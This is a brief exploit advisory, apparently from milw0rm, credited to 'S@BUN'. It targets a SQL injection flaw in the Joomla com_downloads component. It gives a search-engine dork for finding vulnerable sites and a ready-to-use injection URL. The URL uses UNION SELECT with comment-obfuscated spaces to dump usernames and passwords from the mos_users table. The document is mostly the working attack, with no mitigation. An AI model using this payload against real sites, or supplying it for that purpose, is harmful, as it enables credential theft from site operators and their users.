########################################################################
#

#

#   joomla SQL Injection (cat)(com_downloads)

#

########################################################################
#

#

# AUTHOR : S@BUN

#

# HOME : http://www.milw0rm.com/author/1334

#

# MA?L : www.milw0rm.com (at) gmail (dot) com [email concealed]

#

########################################################################
#

#

#  DORK 1 : allinurl:"selectcat"com_downloads

#

########################################################################
#

EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=selectcat&cat=-1/**/uni
on/**/select/**/concat(username,0x3a,password),concat(username,0x3a,pass
word),concat(username,0x3a,password)/**/from/**/mos_users/*

########################################################################
#

# S@BUN      i AM NOT HACKER          S@BUN

########################################################################
#